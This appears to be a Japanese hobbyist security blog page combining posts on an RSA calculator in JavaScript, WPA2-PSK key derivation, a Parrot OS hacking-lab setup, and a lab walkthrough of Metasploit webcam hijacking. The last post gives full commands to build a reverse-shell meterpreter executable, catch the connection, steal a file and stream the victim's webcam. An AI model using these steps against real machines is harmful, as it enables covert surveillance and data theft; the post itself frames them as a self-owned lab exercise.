計算器

素数$ p $
素数$ q $
平文$ M $

計算

定義

2つの異なる素数$p,q$および平文$ M $を与える．ただし$0 \leq M \leq pq - 1$．

• $N = pq$
• $\phi (N) = (p - 1)(q - 1)$
• $\gcd (e, \phi (N)) = 1$
• $d = e^{-1} \mod \phi (N)$
• $C = M^{e} \mod N$
• $M_{d} = C^{d} \mod N$

なお，$e$は$\phi(N)$に対して互いに素となる数のうち最小のもの．

プログラム

JavaScriptです．

calc()

メインの関数です．見栄え重視のために入出力部分は省略しています．

function calc() {
    var p, q, M;

    // 入力値の検証
    if (isNaN(p) || isNaN(q) || isNaN(M)) return;
    if (!isPrime(p) || !isPrime(q)) return;
    if (p == q) return;
    if (M < 0 || (p * q - 1) < M) return;

    // NおよびΦ(N)の計算
    var N = p * q;
    var phi_N = (p - 1) * (q - 1);

    // eの計算
    var e = 2;
    while(gcd(phi_N, e) != 1) e++;

    // dの計算(拡張ユークリッド互除法)
    var d = 2;
    while(e * d % phi_N != 1) d++;

    // べき剰余の計算
    var C = powmod(M, e, N); // 暗号化
    var Md = powmod(C, d, N); // 復号
}

isPrime()

入力nが素数であるかを判定します．低効率．

function isPrime(n) {
    if (n < 2) return false; // 1以下なら素数でない
    if (n == 2) return true;  // 2は素数
    if (n % 2 == 0) return false; // 2以外の偶数は素数でない

    // √nまでの奇数についてnの剰余を求める
    var m = Math.sqrt(n);
    for (var i = 3; i <= m; i += 2) {
        if (n % i == 0) return false;
    }
    return true;
}

gcd()

入力aとbの最大公約数を求めます．

function gcd(a, b) {
    if (a % b == 0) return b;
    else return gcd(b, a % b);
}

powmod()

繰り返し自乗法によって$M^{k} \mod N$を求めます．

function powmod(M, k, N) {
    var v = 1;
    for (var i = 0; i < k; i++) {
        v *= M;
        if (v >= N) v %= N;
    }
    return v;
}

WPA2-PSKの鍵共有プロセス

「wpa 解析」とか「wpa2 解析」とかの検索ワード経由での本ブログの記事へのアクセスが増えています(2020/08/10時点)．該当記事では単純にAircrack-ngを用いてパスワード解析を行う手順を示しただけで，肝心のプログラムがどのように動いているか等の情報はほとんど書きませんでした．これではScript kiddieでさえないので，WPA2-PSKの認証プロセスを調べ，Aircrack-ngと似たような働きをするプログラムをC言語で書いてみました．本稿はその前半です．

大まかな流れ

WPA2-PSKにおける認証を簡単に表すとこのようになります．

1. アクセスポイント(以下AP)とクライアント(以下CL)間で，SSIDとお互いのMACアドレスを共有する
2. APは共有された情報と設定されたWPAキー(パスワード)から一時的な鍵を生成する
3. CLのユーザはパスワードを入力し，それと共有情報から一時的な鍵を生成する
4. 4-Way Handshakeによってユーザが入力したパスワードが正しいか判定し暗号鍵を共有する
5. 暗号化された通信を開始する

本稿では，4-Way Handshakeと各鍵の生成方法について書いていきます．

4-Way Handshake

4-Way Handshakeとは，4つのパケットをやり取りすることで，暗号化通信に用いるPTKとGTKという2つの鍵を共有する手順のことです．GTKはそのAPに対する接続すべてで同じものを用いますが，PTKはCLごとに異なり，さらにPTKが経路上を流れることはありません．WPA2ではPTKやGTKを定期的に更新することで安全性を高めています．

4-Way Handshakeの挙動を以下に示します．ユーザが接続したいSSIDを選んでパスワードを入力し，「接続」ボタンを押すとこのようなやり取りがなされるわけです．

鍵やパスワードのデータが直接経路上でやり取りされることがないため，チャレンジ・レスポンス方式による認証であると分かります．なお，各パラメータの生成タイミングは実装により異なることがあります．

前提として，CLのユーザは正しいパスワードを入力したものであるとします．APとCLはそれぞれパスワードとSSIDを用いてPSKと呼ばれる鍵を生成します．WPA2-PSKの場合，PSKはPMKと同一であるため，これでPMKの共有が完了したことになります．

PMKを生成したあと，APは疑似乱数を用いてナンスと呼ばれる256bitのデータを生成します(図におけるナンスA)．このナンスAを4-Way Handshakeのメッセージ1としてCLに送ります(#1)．

同時にCLもナンスを生成します(ナンスS)．CLはPMK，APおよびCLのMACアドレス，生成したナンスS，そしてAPから送られてきたナンスAを用いて，PTKを生成します．そしてナンスSをメッセージ2としてAPに送ります(#2)．

CLからナンスSを受け取ったAPも同様の手順でPTKを生成します．APはGTKを暗号化し，さらに暗号化したGTKとPTKを用いてMICという値を作成し，暗号化されたGTKとMICをメッセージ3としてCLに送ります(#3)．

メッセージ3を受領したCLは暗号化されたGTKを受け取り，自らのPTKを用いてMICを計算します．この結果と受け取ったMICが同じであることを確認し，APにACKを送ります(#4)．

以上の手順によってPTKとGTKが共有され暗号化通信を開始する準備が完了します．

鍵の生成方法

PMK

PMKはPairwise Master Keyの略であり，鍵長は256bit(32バイト)です．WPA2-PSKでは後に示すPSKと同じ値になります．

PSK

PSKはPre-Shared Keyの略で，事前共有鍵という意味です．パスワードとSSIDから一意に求められます．計算手順の概略図を示します．

まず，パスワードをメッセージ，SSIDの末尾に整数(int型，4バイト)の「1」を付加したものをソルトとして，疑似乱数関数(PRF: Pseudo-Random Function)であるHMAC-SHA-1による160bitのMAC値を求めます．以降はパスワードをメッセージ，前段で求めたMAC値をソルトとしてさらにMAC値を求めていき，これを4096段まで行います．
全段の出力のXOR(排他的論理和)をとったものがPSKの先頭160bitとなります．

続いて，SSIDの末尾に付加する整数を「2」とし，同様に全4096段の出力のXORをとったものを，PSKの161bit目におきます．この時点でPSKのデータは320bitとなっており，このうちの先頭256bitが実際のPSKとなります．

この一連の操作はPBKDF2(Password-Based Key Derivation Function 2)という名前の鍵導出関数です．SSIDが固定の場合でも，パスワード1パターンに対してHMAC-SHA-1を8192回も実行する必要があります．これによって，総当たり攻撃に対する耐性を高めているものと考えられます．

PTK

PTKはPairwise Transient Keyの略で，鍵長は640bit(80バイト)です．PTKを求めるには，まずPKEというデータを用意する必要があります．

PKEは800bit(100バイト)のデータで，以下のような構造です．

まず，先頭に文字列として「Pairwise key expansion」を並べます．char型配列に1文字ずつ並ぶ感覚です．これで23バイト目までが埋まります(null文字'\0'もカウントします)．
次に，APとCLのMACアドレスを並べます．2つのMACアドレスを比較し(これにはmemcmp()関数を用います)，小さい方を先に，大きい方を後に並べます．MACアドレスは1つ6バイトであるため，この操作によって35バイト目までが埋まります．
続いて，APとCLがそれぞれ生成したナンスを並べます．これもMACアドレスと同様に大きさを比較し小さい方から並べていきます．ナンスは1つ32バイトなので，これで99バイトまで埋まります．
最後の1バイトは8bitの符号なし整数を付加します．

さて，PKEを構築したのでPTKの計算手順を示します．

PMKをメッセージ，PKEをソルトとして，HMAC-SHA-1によるMAC値を4回求め，それを並べたものがPTKになります．なお，MAC値を計算する際にはPKE末尾の8bit符号なし整数の値を1から4まで変化させます．

鍵計算全体のフロー

鍵を導出する手順全体は以下のようになります．

おわり

4-Way Handshakeと認証に用いるいくつかの鍵の計算方法について書きました．次回は，これらの情報をもとに，パケットキャプチャファイルとパスワード辞書からWi-Fiのパスワードを調べるプログラムについて書こうと思います．

おまけ: Aircrack-ngを用いたWPA2キーの解析

a3vtyq2e9ua1.hatenablog.com

少し前にTwitterで流行ったやつとは関係ない

Webカメラを遠隔操作する実験はIPUSIRON氏の「ハッキング・ラボのつくりかた 仮想環境におけるハッカー体験学習」という本を参考に行いました．この本での実験環境を，Kali Linuxの代わりにParrot Security OSを用いて構築してみようと思ったのでメモしておきます．

https://www.shoeisha.co.jp/book/detail/9784798155302

Parrot Security OSは，セキュリティに特化したDebianベースのLinuxディストリビューションです．セキュリティ特化ディストロといえばKali Linuxですが，こういうのもあるというのを知ったので使ってみました．

ディスクイメージのダウンロード

公式サイトからISOをダウンロードしてきます．本稿記述時における最新版は4.9.1なので，Parrot-security-4.9.1_x64.isoを落としてきました．

https://parrotlinux.org/download/

Securityを選択した画面ではMATE版，KDE版，そしてOVA版があると思います．私は好みの関係でMATEを選びました．直接ダウンロードするなりTorrentを使うなりしてイメージファイルを入手します．

仮想マシンの設定とインストール

VirtualBoxの仮想マシンを作ります．私は下のような設定としました．

• 名前 : parrot
• タイプ : Linux
• バージョン : Debian (64-bit)
• RAM : 2GB (2048MB)
• ハードディスク : 20GB

仮想光学ドライブに上でダウンロードしたISOファイルを割り当て仮想マシンを起動します．メニューが出てくるのでLiveを選択しそのまま放っておけばデスクトップが表示されます．

デスクトップのInstall Parrotをダブルクリックすれば，ガイドに従ってハードディスクにインストールできます．はじめに日本語を選択しておけば日本語環境がインストールされるので便利です．

パーティショニング等はお好きに設定してください．

アップデート

インストールが終了したらOSのアップデートを行います．公式では

# apt update && apt upgrade

をやった結果は保証できないので

# parrot-upgrade

でアップデートしてね．

と書いてありましたが，どうもうまくいかないのでapt update && apt upgradeでアップデートします．正確に言えばapt updateしたあとapt dist-upgradeしました．
途中止まることがあるかもしれませんが，そういうときは再度コマンドを実行するとうまくいくかもしれません．

アップデートが完了したら一旦仮想マシンをシャットダウンしておきます．

ネットワークの設定

仮想環境で実験できるようにネットワーク周りの設定をします．
parrotにネットワークアダプターを2つ設定し，1つをホストオンリー，もう1つをNATに設定することで，インターネットアクセスを可能にしつつホストオンリーネットワークでの実験も可能になります．

私の環境では，ホストオンリーネットワークは10.0.0.0/24に設定してあります．parrotのアダプター1には10.0.0.6を割り当てます．

VirtualBoxマネージャーからparrotのネットワーク設定を変更します．
仮想マシンparrotの設定画面を開き，左側の項目からネットワークを選択します．
アダプター1について以下の設定を適用します．

• ネットワークアダプターを有効化(E) : チェック
• 割り当て(A) : ホストオンリーアダプター
• 高度(D)
  • ケーブル接続 : チェック

同様にアダプター2について設定します．

• ネットワークアダプターを有効化(E) : チェック
• 割り当て(A) : NAT

設定が済んだらOKボタンを押して完了します．

続いてOS側の設定を行います．ここではVimを使いますが，他のテキストエディタでも構いません．
仮想マシンを起動し，ログインを済ませ，端末を開き以下を実行します．

$ sudo vim /etc/network/interfaces

すると下のような表示がなされると思います．

# interfaces(5) file used by ifup(8) and ifdown(8)
# Include files from /etc/network/interfaces.d:
source-directory /etc/network/interfaces.d

これに続き以下を入力します．

auto eth0
iface eth0 inet static
address 10.0.0.6
netmask 255.255.255.0

auto eth1
iface eth1 inet dhcp

:wqで保存し仮想マシンを再起動します．再起動の後に端末でifconfigを実行した結果が下の図です．

eth0には10.0.0.6が，eth1には10.0.3.15が割り当てられていることが確認できます．

試してみる

ひと通りの設定が完了しました．私の環境ではホストオンリーネットワーク内の10.0.0.5にMetasploitable2が割り当てられているので，ちょっかいをかけてみました．概念図を示します．

VirtualBoxマネージャーからMetasploitable2の仮想マシンを起動しログインしておきました．
Parrot側で端末を起動し，sudo nmap -sV -O 10.0.0.5を実行しました．結果の一部を下に示します．

Nmapの出力から，Metasploitable2はLinux 2.6で動いていることが分かります．また開いたポート一覧が確認できます．3306番が開いているということはMySQLが動作しているということなので，攻撃の手掛かりになりそうです．

おまけ 日本語入力の設定

ここまででハッキングラボの構築には問題ないと思いますが，日本語入力ができないとインターネット検索やちょっとしたメモをする時に困るかもしれません．そこで日本語入力ができるように設定します．

日本語IMが入っていないのでインストールします．ここではfcitx-mozcをインストールします．

$ sudo apt install fcitx-mozc

上部メニューの System -> 設定 -> その他 -> Fcitx設定 を選びます．
全体の設定タブを選択し，入力メソッドのオンオフ横の空をクリックし[全角/半角]キーを押します．すると空がZenkakuhankakuに変わります．
一度ログアウトして再度ログインしなおせば日本語入力が可能となります．

おわり

Parrot Securityの設定について書きました．NmapやMetasploit等の王道ツールはひと通り揃っているし，見た目も結構凝っていて綺麗なので，興味があればParrotを使ってみるのも面白いかと思います．
何というか，Kaliのデザインってなんか小学生男子のドラゴンの裁縫セットっぽいと思いませんか？　私は嫌いではないですけど．

Z○○mとか色々流行ってるらしい

最近リモートワークとか何とかでWebカメラが注目されていますね．
しかし，例えばコンピュータがマルウェアに感染している等不適切な状態で使用すればプライベートや機密情報が筒抜けになってしまう恐れがあります．

ということでMetasploitを用いたWebカメラの遠隔操作の実験をやってみました．

この本を参考にしました．とても面白い本なのでおすすめです．
https://www.shoeisha.co.jp/book/detail/9784798155302
IPUSIRON,『ハッキング・ラボのつくりかた 仮想環境におけるハッカー体験学習』,株式会社翔泳社,2018年

これはセキュリティの知識を深めるための実験であり，犯罪行為を唆すものではありません．実験する際は必ず自分が管理する機器を用いてください．自分のものではないネットワークに対しこのようなことを行うのは非倫理的かつ犯罪であり，厳しく罰せられるべきです．

実験環境

• ルータ(アクセスポイント)
  • 以下2台のパソコンを接続
• Windowsパソコン
  • OSはWindows10 64bit
  • IPアドレスは192.168.1.100
  • アンチウィルスソフトを使用していない
  • Windows Defenderのリアルタイム保護は無効
  • Webカメラが付いてる
• 攻撃用パソコン
  • OSはArch Linux
  • IPアドレスは192.168.1.123
  • Metasploit Frameworkが使える
  • GUI環境がある(実験ではXfce4)
  • GUIのWebブラウザが使える(実験ではFirefox)

最終的にこんな感じになる↓

ペイロードの作成

シェルコードを含んだプログラムを作ります．

攻撃用パソコンの端末でmsfvenom -p [ペイロード] LHOST=[攻撃用パソコンのIP] -f [出力ファイル形式] -o [出力ファイル]を実行します．
今回，ペイロードはwindows/x64/meterpreter/reverse_tcp，攻撃用パソコンのIPアドレスは192.168.1.123，出力ファイル形式はexe，出力ファイル名は~/ayashii.exeとします．

> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.123 -f exe -o ~/ayashii.exe

ホームディレクトリにayashii.exeが出力されます．このEXEをClamAV等のアンチウィルスソフトで検査するとトロイの木馬判定をくらいます．

ペイロードをWindowsパソコンで実行する

まず，ayashii.exeをWindowsパソコンに保存します．ファイル共有でもNASでもUSBメモリでも構いませんが，リアルタイム保護を無効化していないと保存の時点で弾かれます．
実験ではC:\User\user\Desktop\folderに保存しました．

さて，保存したayashii.exeを実行します．何も起こらないか，あるいは一瞬だけ何かのウィンドウが開いてまた消えます．

リバースコネクトを待ち受ける

攻撃用パソコンでMetasploitを使用します．

端末でmsfconsoleを実行すると，少々時間が掛かるかもしれませんがMetasploitが起動して楽しいバナーアスキーアートとmsfプロンプトが表示されます．

モジュールの設定

ハンドラモジュールexploit/multi/handlerを実行します．

msf > use exploit/multi/handler

ペイロードの指定

Meterpreterセッション確立するためのペイロードとしてwindows/x64/meterpreter/reverse_tcpを指定します．

msf > set payload windows/x64/meterpreter/reverse_tcp

IPアドレス・ポート番号の設定

攻撃用パソコンのIPアドレスを192.168.1.123，使用するポート番号を4444に設定します．

msf > set LHOST 192.168.1.123

msf > set LPORT 4444

実行！

設定したハンドラを実行します．

msf > exploit

ayashii.exeを実行していれば，セッションが確立されMeterpreterプロンプトが表示されると思います．表示されない場合もう一度Windowsパソコンでayashii.exeを実行してみます．

ファイルを盗んでみる

Windowsパソコンの操作を奪いました．したがって以降は全て攻撃用パソコンのMeterpreterプロンプトで操作します．

カレントディレクトリを表示する

カレントディレクトリを調べます．Linuxのコマンドと同様にpwdで出力されます．

meterpreter > pwd

実験ではayashii.exeを保存したC:\User\user\Desktop\folderが表示されました．

カレントディレクトリの中身を覗く

これもLinuxコマンドと同じくlsで可能です．

meterpreter > ls

実験ではayashii.exeとsecret.txtが表示されました．

ファイルをダウンロードする

downloadコマンドでファイルを保存できます．試しにsecret.txtを盗んでみます．

meterpreter > download secret.txt

C:\User\user\Desktop\folder\secret.txtが攻撃用パソコンのホームディレクトリに保存されました．

~/secret.txtをVimで開いてみました．

Webカメラで盗撮してみる

Webカメラを遠隔操作してみます．

有効なWebカメラがあるか確認する

当然ですがWindowsパソコンにWebカメラが無ければ操作できるはずがありません．Meterpreterプロンプトでwebcam_listを実行します．存在すればリストアップされるし，無ければ無いと言われます．

meterpreter > webcam_list

実験に使用したWindowsパソコンの構成は以下のようであるため，2つのWebカメラが検出されました．

Webカメラで盗撮する．

Webカメラのストリーム映像を表示するには，webcam_stream -i [Webカメラの番号]を実行します．
今回の実験ではUSB接続のカメラのデータを見たいため[Webカメラの番号]に2を指定しましたが，デフォルトでは1です．

meterpreter > webcam_stream -i 2

以上を実行するとWebブラウザが開きストリーム映像が出力されます．
エラーが起こる場合はcheeseをインストールすると解決するかもしれません．cheeseはGnome向けのカメラアプリです．

おわり

Webカメラを遠隔操作する実験をやってみました．WindowsパソコンからしてみればアヤシイEXEファイルを実行しただけで盗撮されてしまうので恐ろしいことこの上ないですね．

さて，今回の実験は「ハッキング・ラボの作り方」という書籍を参考に行いました．しかし書籍と異なりペイロードの自動起動を有効にしてバックドアを設置する手順は省略しました．というのも，Windows10ではWindows Defenderのリアルタイム保護を無効に設定しても，一度電源を落とすと自動的に有効になってしまうからです．つまり，実験終了後にパソコンを再起動して再びayashii.exeを実行するとWindows Defenderのアラートが出ると考えられます．

Windowsパソコンを使う際は，必ず何らかのウィルス対策を講じて，不審なプログラムは実行しないようにしましょう．
次回は権限昇格とかパスワードの解析とかやるかも．